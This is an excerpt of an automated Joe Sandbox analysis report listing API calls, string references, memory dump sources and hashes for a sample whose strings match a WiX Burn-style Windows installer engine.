                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to allocate memory registry value., xrefs: 0086A587
                                                                                                                                                                                                                                                                                                  • Failed to query registry key value size., xrefs: 0086A554
                                                                                                                                                                                                                                                                                                  • Failed to read registry value., xrefs: 0086A6F6
                                                                                                                                                                                                                                                                                                  • Failed to set variable., xrefs: 0086A72B
                                                                                                                                                                                                                                                                                                  • Failed to get expand environment string., xrefs: 0086A6DD
                                                                                                                                                                                                                                                                                                  • Unsupported registry key value type. Type = '%u', xrefs: 0086A608
                                                                                                                                                                                                                                                                                                  • Failed to format value string., xrefs: 0086A48B
                                                                                                                                                                                                                                                                                                  • Failed to open registry key., xrefs: 0086A4ED
                                                                                                                                                                                                                                                                                                  • Failed to change value type., xrefs: 0086A70F
                                                                                                                                                                                                                                                                                                  • Failed to allocate string buffer., xrefs: 0086A667
                                                                                                                                                                                                                                                                                                  • Registry key not found. Key = '%ls', xrefs: 0086A4B4
                                                                                                                                                                                                                                                                                                  • Failed to clear variable., xrefs: 0086A4D8
                                                                                                                                                                                                                                                                                                  • Failed to query registry key value., xrefs: 0086A5DA
                                                                                                                                                                                                                                                                                                  • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0086A51C
                                                                                                                                                                                                                                                                                                  • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 0086A740
                                                                                                                                                                                                                                                                                                  • Failed to format key string., xrefs: 0086A465
                                                                                                                                                                                                                                                                                                  • search.cpp, xrefs: 0086A54A, 0086A57D, 0086A5D0, 0086A6D3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Open@16$Close
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000100,00000100,00000100,00000000,00000000,00000000,?,0086A8B4,00000100,000002C0,000002C0,00000100), ref: 00865795
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(000002C0,?,0086A8B4,00000100,000002C0,000002C0,00000100), ref: 0086579F
                                                                                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 008659A7
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000100,00000000,000002C0,000002C0,00000000,000002C0,00000001,?,0086A8B4,00000100,000002C0,000002C0,00000100), ref: 00865C4A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave_wcschrlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1026845265-2050445661
                                                                                                                                                                                                                                                                                                  • Opcode ID: 26617ddd43079085f5e7241feca29fd7f1793b16e57a340f2c5a104484613402
                                                                                                                                                                                                                                                                                                  • Instruction ID: b11e6e22501d6d4c7c0acfc9476990ca362bcba040a8e9e327135bb44f82bac2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26617ddd43079085f5e7241feca29fd7f1793b16e57a340f2c5a104484613402
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EF18271901729EFDF119FA48841EAF7BA4FB05B20F168129FD15EB640D7749A01CBE1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,0088D558,?,?,?), ref: 0088CEC7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0088D558,?,?,?), ref: 0088CED4
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 0088D13C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
                                                                                                                                                                                                                                                                                                  • String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
                                                                                                                                                                                                                                                                                                  • API String ID: 3944734951-2991465304
                                                                                                                                                                                                                                                                                                  • Opcode ID: dbbc3f0c3f4fd88ab37b9edc4562c1c7bf27f33eaeb2137dc8707a416e164a05
                                                                                                                                                                                                                                                                                                  • Instruction ID: 18a0637c8076793cc8b176346a6ebac10f9a8c524801ab15b9481cf1f2e26cb5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbbc3f0c3f4fd88ab37b9edc4562c1c7bf27f33eaeb2137dc8707a416e164a05
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7781F076A41726FBD721AB688809F9ABBA4FF05760F024125FE14EB381D775DC008BE5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A32F3: VariantInit.OLEAUT32(?), ref: 008A3309
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A32F3: SysAllocString.OLEAUT32(?), ref: 008A3325
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A32F3: VariantClear.OLEAUT32(?), ref: 008A33AC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A32F3: SysFreeString.OLEAUT32(00000000), ref: 008A33B7
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,008ACA9C,?,?,Action,?,?,?,00000000,00865445), ref: 0086EB13
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 0086EB5D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to resize Detect code array in registration, xrefs: 0086EC2E
                                                                                                                                                                                                                                                                                                  • Detect, xrefs: 0086EB04
                                                                                                                                                                                                                                                                                                  • Patch, xrefs: 0086EBDD
                                                                                                                                                                                                                                                                                                  • cabinet.dll, xrefs: 0086EBBA
                                                                                                                                                                                                                                                                                                  • RelatedBundle, xrefs: 0086EA50
                                                                                                                                                                                                                                                                                                  • Failed to resize Patch code array in registration, xrefs: 0086EC43
                                                                                                                                                                                                                                                                                                  • comres.dll, xrefs: 0086EB26
                                                                                                                                                                                                                                                                                                  • Failed to get RelatedBundle element count., xrefs: 0086EA97
                                                                                                                                                                                                                                                                                                  • version.dll, xrefs: 0086EB70
                                                                                                                                                                                                                                                                                                  • Failed to resize Addon code array in registration, xrefs: 0086EC3C
                                                                                                                                                                                                                                                                                                  • Invalid value for @Action: %ls, xrefs: 0086EC52
                                                                                                                                                                                                                                                                                                  • Failed to get next RelatedBundle element., xrefs: 0086EC70
                                                                                                                                                                                                                                                                                                  • Action, xrefs: 0086EAD0
                                                                                                                                                                                                                                                                                                  • Failed to get @Id., xrefs: 0086EC62
                                                                                                                                                                                                                                                                                                  • Addon, xrefs: 0086EB9A
                                                                                                                                                                                                                                                                                                  • Failed to get @Action., xrefs: 0086EC69
                                                                                                                                                                                                                                                                                                  • Upgrade, xrefs: 0086EB50
                                                                                                                                                                                                                                                                                                  • Failed to get RelatedBundle nodes, xrefs: 0086EA72
                                                                                                                                                                                                                                                                                                  • Failed to resize Upgrade code array in registration, xrefs: 0086EC35
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$CompareVariant$AllocClearFreeInit
                                                                                                                                                                                                                                                                                                  • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 702752599-259800149
                                                                                                                                                                                                                                                                                                  • Opcode ID: fd4618fec39cde772e1fc0896acd708fe4c6bbb443831a853f2978cf6beb5332
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3f112fc16e1854cb9e3cf57fb2380aeb8980b659c808d09c148a8f34ffc7e845
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd4618fec39cde772e1fc0896acd708fe4c6bbb443831a853f2978cf6beb5332
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5571BE3990462ABBDB10CB94C995EAEBBB4FB05724F210254F921EB7C1D774AE11CB90
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,00874BF5,008AB4E8,?,feclient.dll,00000000,?,?), ref: 008746F3
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,00874BF5,008AB4E8,?,feclient.dll,00000000,?,?), ref: 00874714
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00874BF5,008AB4E8,?,feclient.dll,00000000,?,?), ref: 0087471A
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(feclient.dll,00000000,008AB518,?,00000000,00000000,008AB519,?,00874BF5,008AB4E8,?,feclient.dll,00000000,?,?), ref: 008747A8
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00874BF5,008AB4E8,?,feclient.dll,00000000,?,?), ref: 008747AE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastRead$CurrentProcess
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$feclient.dll$msasn1.dll$pipe.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1233551569-452622383
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3ca10c7aab61159afeea0daf17939662b879c5a5ebe5bf357ffc0ad5bc319b1b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6ee05053cde98cbea381d25fd9f508c5e8cc33378e5198ec7a82290d6eaac636
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ca10c7aab61159afeea0daf17939662b879c5a5ebe5bf357ffc0ad5bc319b1b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A51B536D4022AB7DB219A984C46FAF7668FB01B60F119175FE24FB281D774DD0096E2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                                                                                                                                                  • String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
                                                                                                                                                                                                                                                                                                  • API String ID: 760788290-1911311241
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3490da66ec28566481263365c4ef45d1814a1041d0352dd6193153ac0700d70c
                                                                                                                                                                                                                                                                                                  • Instruction ID: ebc4d899811eef94c14dbb2f8714e7bbee2f39edc439f8725888af84588c7cad
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3490da66ec28566481263365c4ef45d1814a1041d0352dd6193153ac0700d70c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6641B671E88727B6DA3575688C42FBAB658FB15B30F200321F934F63C5DBA899019392
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,56008ADB,00000001,?,00869946,?,00000000,00000000,?,?,0086992E,?,?,00000000,?), ref: 00868FB2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • condition.cpp, xrefs: 00869084, 0086914E, 008691CA, 0086922E, 0086936C, 008693B0, 008693F4
                                                                                                                                                                                                                                                                                                  • Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 00869098
                                                                                                                                                                                                                                                                                                  • Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 008693C4
                                                                                                                                                                                                                                                                                                  • -, xrefs: 00869118
                                                                                                                                                                                                                                                                                                  • Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 00869380
                                                                                                                                                                                                                                                                                                  • AND, xrefs: 008692BC
                                                                                                                                                                                                                                                                                                  • Failed to set symbol value., xrefs: 00869060
                                                                                                                                                                                                                                                                                                  • Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 00869242
                                                                                                                                                                                                                                                                                                  • Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 00869408
                                                                                                                                                                                                                                                                                                  • Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 00869162
                                                                                                                                                                                                                                                                                                  • NOT, xrefs: 008692DB
                                                                                                                                                                                                                                                                                                  • Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 008691DE
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: StringType
                                                                                                                                                                                                                                                                                                  • String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4177115715-3594736606
                                                                                                                                                                                                                                                                                                  • Opcode ID: d22577dc6b422831cb0c38ecfb11b4d1077501874b0905b2f331839d85ffcd6e
                                                                                                                                                                                                                                                                                                  • Instruction ID: e54a20c0e2034f6fd0df72fa4f48ca94e669fe908fd47b4383b21e496d479766
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d22577dc6b422831cb0c38ecfb11b4d1077501874b0905b2f331839d85ffcd6e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7F11171600305FFEB248F58C889BBA7BACFB05704F114146F995DAAC5CBB5DA92CB84
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 00881CB8
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 00881CD6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareHeapString$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$error$exeengine.cpp$forceReboot$scheduleReboot$success
                                                                                                                                                                                                                                                                                                  • API String ID: 2664528157-1714101571
                                                                                                                                                                                                                                                                                                  • Opcode ID: ef0c86256e78ee790fd9837e75667611f605b48b10e3ae15be081593bef46715
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0779c433fb38e513ee831a08a70ac7a600b2158fb826439cad443a994a80bed0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef0c86256e78ee790fd9837e75667611f605b48b10e3ae15be081593bef46715
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E61A331A4421ABBDF10AB94CC45FAEBBA9FF41720F204255F421EB391DBB49E41D791
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086D4A8: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,00877040,000000B8,00000000,?,00000000,75A4B390), ref: 0086D4B7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086D4A8: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0086D4C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086D4A8: LeaveCriticalSection.KERNEL32(000000D0,?,00877040,000000B8,00000000,?,00000000,75A4B390), ref: 0086D4DB
                                                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,008757BD,?,00000000,00000000), ref: 00876E34
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00864522,?,008AB500,?,00864846,?,?), ref: 00876E43
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00864522,?,008AB500,?,00864846,?,?), ref: 00876EA0
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 00876F92
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00876F9B
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(crypt32.dll,?,00000000,?,00000000,00000001,00000000), ref: 00876FB5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0088BD05: SetThreadExecutionState.KERNEL32(80000001), ref: 0088BD0A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to cache engine to working directory., xrefs: 00876D71
                                                                                                                                                                                                                                                                                                  • UX aborted apply begin., xrefs: 00876C94
                                                                                                                                                                                                                                                                                                  • Failed to create cache thread., xrefs: 00876E71
                                                                                                                                                                                                                                                                                                  • core.cpp, xrefs: 00876C8A, 00876E67
                                                                                                                                                                                                                                                                                                  • Failed to register bundle., xrefs: 00876DEE
                                                                                                                                                                                                                                                                                                  • Failed to elevate., xrefs: 00876D94
                                                                                                                                                                                                                                                                                                  • Another per-user setup is already executing., xrefs: 00876CD8
                                                                                                                                                                                                                                                                                                  • Engine cannot start apply because it is busy with another action., xrefs: 00876C28
                                                                                                                                                                                                                                                                                                  • Failed to set initial apply variables., xrefs: 00876D02
                                                                                                                                                                                                                                                                                                  • Another per-machine setup is already executing., xrefs: 00876DC8
                                                                                                                                                                                                                                                                                                  • crypt32.dll, xrefs: 00876ECD, 00876EE7, 00876FB4
                                                                                                                                                                                                                                                                                                  • Failed while caching, aborting execution., xrefs: 00876E98
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle$CriticalSectionThread$CompareCreateEnterErrorExchangeExecutionInterlockedLastLeaveMutexReleaseState
                                                                                                                                                                                                                                                                                                  • String ID: Another per-machine setup is already executing.$Another per-user setup is already executing.$Engine cannot start apply because it is busy with another action.$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2169948125-4292671789
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0c3bda969b1c193f026f492eba210c2065cad66c4b3144e3c7fdbb395e9d3b81
                                                                                                                                                                                                                                                                                                  • Instruction ID: b0821d3abcee71dd3ba050a06a585e3e1cfcc40a4c5b620d567bad8b93d60717
